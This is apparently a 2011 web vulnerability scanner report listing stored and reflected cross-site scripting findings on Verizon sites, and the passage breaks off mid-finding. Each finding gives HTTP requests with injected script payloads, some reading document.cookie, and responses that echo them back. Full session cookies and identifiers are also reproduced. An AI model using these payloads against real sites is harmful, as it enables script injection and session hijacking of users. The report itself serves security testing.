Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://search.verizon.com/ [vsrecentsearches cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /

Issue detail

The value of the vsrecentsearches cookie submitted to the URL / is copied into the HTML document as plain text between tags at the URL /. The payload 5d89e<script>alert(1)</script>9b63ecd16e6 was submitted in the vsrecentsearches cookie. This input was returned unmodified in a subsequent request for the URL /.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=l&rv=l&q=xss&search.x=0&search.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=5d89e<script>alert(1)</script>9b63ecd16e6; CP=null*

Request 2

GET /?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=l&rv=l&q=xss&search.x=0&search.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=xss~xss%20sq~~~; CP=null*

Response 2

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:32 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 70437


                   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
<!-- mp_trans_searchkwd_start -->5d89e<script>alert(1)</script>9b63ecd16e6<!-- mp_trans_searchkwd_end -->
...[SNIP]...

1.2. http://www22.verizon.com/residentialhelp/fiostv [ECSPCookies cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/fiostv

Issue detail

The value of the ECSPCookies cookie submitted to the URL /residentialhelp/fiostv is copied into the HTML document as plain text between tags at the URL /residentialhelp/fiostv. The payload 110ed<script>alert(1)</script>af81f92fd39 was submitted in the ECSPCookies cookie. This input was returned unmodified in a subsequent request for the URL /residentialhelp/fiostv.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /residentialhelp/fiostv HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 
ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(1)</script>af81f92fd39; CP=null*

Request 2

GET /residentialhelp/fiostv HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 
ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; CP=null*

Response 2

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 239446
Expires: Mon, 05 Sep 2011 22:25:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:45 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(1)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:25:45 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:25:44 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(1)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:25:45 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | FiOS TV
</title><meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
</strong> 110ed<script>alert(1)</script>af81f92fd39</span>
...[SNIP]...

1.3. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The value of the ECSPCookies cookie submitted to the URL /residentialhelp/phone is copied into the HTML document as plain text between tags at the URL /residentialhelp/phone. The payload 92842<script>alert(1)</script>0f823ca4c89 was submitted in the ECSPCookies cookie. This input was returned unmodified in a subsequent request for the URL /residentialhelp/phone.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd3992842<script>alert(1)</script>0f823ca4c89; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Request 2

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response 2

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230585
Expires: Mon, 05 Sep 2011 22:41:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:41:50 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd3992842<script>alert(1)</script>0f823ca4c89; expires=Wed, 05-Sep-2012 22:41:50 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type"
...[SNIP]...
</script>af81f92fd3992842<script>alert(1)</script>0f823ca4c89</span>
...[SNIP]...

2. Cross-site scripting (reflected)
There are 40 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f1646(a)2d6783176d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortalf1646(a)2d6783176d9/smb HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:34:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:34:44 GMT
Connection: close

Resource /SMBPortalf1646(a)2d6783176d9/smb could not be resolved for locale null.

2.2. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 89ffe(a)bc4ab16607b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb89ffe(a)bc4ab16607b HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:34:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:34:44 GMT
Connection: close

Resource /SMBPortal/smb89ffe(a)bc4ab16607b could not be resolved for locale null.

2.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc2a1'-alert(1)-'be3f42647c0 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

